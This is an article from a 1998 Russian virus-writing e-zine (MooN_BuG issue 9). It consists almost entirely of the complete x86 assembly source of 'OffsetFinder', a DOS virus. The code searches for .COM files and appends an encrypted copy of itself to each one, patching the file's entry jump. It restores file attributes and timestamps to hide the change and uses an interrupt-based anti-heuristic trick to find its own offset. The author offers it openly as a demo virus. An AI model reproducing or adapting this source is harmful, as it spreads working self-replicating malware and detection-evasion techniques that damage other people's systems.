[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 9, Dec 1998 file 008
Вирус OffsetFinder
by B!Z0n
;------------------------------------------------------------------
; OffsetFinder DEmO viRuS (c) 1998 by B!Z0n //[BzZ]
; Non overwriting crypt search *.COM infector with
; antiheuristic trick
; Посвящается моей любимой � Аленке ;-*
;------------------------------------------------------------------
.MODEL TINY
.CODE
.386
ORG 100h
MAIN: db 0E9h,00h,00h
START_VIRUS PROC NEAR
;==================================================================
start: mov ax, 0055h ;
mov es, ax ;
xor di, di ;
push ax di ;------------------------ ;
mov eax, 5545455Dh ;0055:0000 5D pop bp ;
stosd ; 45 inc bp ;
mov al, 0CFh ; 45 inc bp ;
stosb ; 55 push bp ;
pop eax ; CF iret ;
xor bx, bx ;------------------------ ;
mov es, bx ;
xchg eax, dword ptr es:[bx] ;
div bx ;
exit: sub bp, offset exit ;
xchg eax, dword ptr es:[bx] ;
;------------------------------------------------------------------
push cs ;
pop es ;
;------------------------------------------------------------------
mov ah, byte ptr ds:[crypt+bp] ;
xor ah, 090h ;
lea si, crypt +bp ;
mov di, si ;
mov cx, finish-crypt ;
cryA: lodsb ;
xor al, ah ;
stosb ;
loop cryA ;
;------------------------------------------------------------------
crypt: nop ;
;==================================================================
lea si,[bp+ORIG_START]
mov di,100h
push di
cld
movsw
movsb
lea dx,[bp+NEW_DTA]
mov ah,1ah
int 21h
FINDFIRST:
mov ah,4eh
lea dx,[bp+COM_MASK]
xor cx,cx
FINDNEXT:
int 21h
jc QUIT
mov ax,3d02h
lea dx,[bp+NEW_DTA+30]
int 21h
xchg ax,bx
CHECK_INFECT:
mov ah,3fh
lea dx,[bp+ORIG_START]
mov cx,3
int 21h
cmp word ptr [bp+ORIG_START], 'ZM'
je CloseFile
mov ax,word ptr [bp+NEW_DTA+26]
mov cx,word ptr [bp+ORIG_START+1]
add cx,END_VIRUS-START_VIRUS+3
cmp ax,cx
jnz INFECT_COM
CloseFile:
mov ah,3eh
int 21h
mov ah,4fh
jmp short FINDNEXT
QUIT:
mov dx,80h
mov ah,1ah
int 21h
retn
INFECT_COM:
mov ax,4301h
xor cx,cx
lea dx,[bp+NEW_DTA+30]
int 21h
mov ax,word ptr[bp+NEW_DTA+26]
sub ax,3
mov word ptr [bp+JMP_OFFSET],ax
mov ah,3eh
int 21h
mov ax,3d02h
int 21h
xchg ax,bx
mov ah,40h
mov cx,3
lea dx,[bp+HEADER]
int 21h
mov al,2
mov ah,42h
xor cx,cx
cwd
int 21h
;==================================================================
mov cx, finish-start ;
lea si, start +bp ;
lea di, finish +bp ;
rep movsb ;
in ax, 40h ;
add si, crypt-start ;
mov di, si ;
mov cx, finish-crypt ;
cryB: lodsb ;
xor al, ah ;
stosb ;
loop cryB ;
;==================================================================
mov ah,40h
mov cx,END_VIRUS-START_VIRUS
lea dx, [bp+finish]
int 21h
mov ax,5701h
mov cx,word ptr [bp+NEW_DTA+22]
mov dx,word ptr [bp+NEW_DTA+24]
int 21h
mov ax,4301h
mov cx,word ptr [bp+NEW_DTA+21]
lea dx,[bp+NEW_DTA+30]
int 21h
mov ah,3eh
int 21h
jmp QUIT
;------------------------------------------------------------------
Copyright db 0,'[B!Z0n //[BzZ]]'
VirName db 0,'[OffsetFinder DEmO viRuS]'
Location db 0,'[Russia, St.Petersburg 1998]',0
;------------------------------------------------------------------
COM_MASK db '*.COM',0
ORIG_START db 0CDh,20h,0
HEADER db 0E9h
;------------------------------------------------------------------
START_VIRUS ENDP
END_VIRUS equ $
;------------------------------------------------------------------
finish:
;------------------------------------------------------------------
JMP_OFFSET dw ?
NEW_DTA db 43 dup(?)
;------------------------------------------------------------------
end MAIN
